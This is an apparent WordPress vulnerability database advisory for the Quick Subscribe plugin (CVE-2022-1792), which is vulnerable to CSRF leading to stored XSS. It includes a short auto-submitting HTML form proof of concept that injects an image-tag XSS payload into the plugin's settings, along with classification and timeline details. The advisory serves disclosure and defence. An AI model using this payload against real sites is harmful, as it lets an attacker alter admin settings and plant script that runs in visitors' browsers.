WordPress Plugin Vulnerabilities

Quick Subscribe <= 1.7.1 - Arbitrary Settings Update via CSRF to Stored XSS

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and leading to Stored XSS due to the lack of sanitisation and escaping in some of them

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=quicksubscribe.php" method="POST">
    <input type="text" name="button_qs" value="1">
    <input type="text" name="label_qs" value='"><img src=x onerror=alert(/XSS/)>ok'>
    <input type="text" name="tks_qs" value="Thanks for subscribing">
    <input type="text" name="submit_qs" value="Update Settings »">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
quick-subscribe
No known fix

References

CVE
CVE-2022-1792

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
44555c79-480d-4b6a-9fda-988183c06909

Timeline

Publicly Published
2022-05-23 (about 1 years ago)
Added
2022-05-23 (about 1 years ago)
Last Updated
2023-02-16 (about 1 years ago)

Other

Published
Title
Published
2023-11-13
Title
Autolinks Manager < 1.10.05 - CSRF
Published
2022-11-09
Title
Quick Restaurant Reservations < 1.5.5 - CSRF
Published
2021-08-23
Title
Comment Link Remove and Other Comment Tools < 2.1.6 - Arbitrary Comment Deletion via CSRF
Published
2024-05-09
Title
Unyson < 2.7.31 - Cross-Site Request Forgery
Published
2023-11-16
Title
Easy Call Now by ThikShare <= 1.1.0 - Cross-Site Request Forgery via settings_page